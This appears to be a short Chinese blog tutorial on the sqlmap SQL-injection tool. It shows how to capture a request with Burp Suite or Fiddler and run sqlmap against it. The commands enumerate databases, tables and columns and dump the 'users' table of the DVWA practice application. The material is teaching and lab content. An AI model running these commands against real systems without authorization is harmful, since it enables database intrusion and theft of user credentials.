sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了
windows使用
Windows10
Fiddler2
sqlmap
python3
1、利用Burpsuite或者Fiddler抓取数据包,命名为1.txt
2、将数据包放在sqlmap的文件夹下,运行python sqlmap.py -r 1.txt
.某个参数python sqlmap.py -r 1.txt -p username
linux使用步骤
1、将抓取的数据包保存为文件[如:11]
![](https://img.haomeiwen.com/i14822389/8a5cb9319d118352.png)
2、运行sqlmap跑文件--->sqlmap -r 11 --dbs
![](https://img.haomeiwen.com/i14822389/25ba139c71aef32c.png)
注:
sqlmap.py -r 1.txt -p uname
[-p:指定注入参数]
3、列举数据库表中的表--->sqlmap -r 11 --tables -D dvwa
![](https://img.haomeiwen.com/i14822389/fe78ceacdd9201d8.png)
4、列举数据库表中的字段--->sqlmap -r 11 --columns -T users -D dvwa
![](https://img.haomeiwen.com/i14822389/f110c20ef43c234d.png)
5、获取整个表的数据--->sqlmap -r 11 --dump -T users -D dvwa
![](https://img.haomeiwen.com/i14822389/dce7f751e2cf9e3e.png)
6、使用手册
网友评论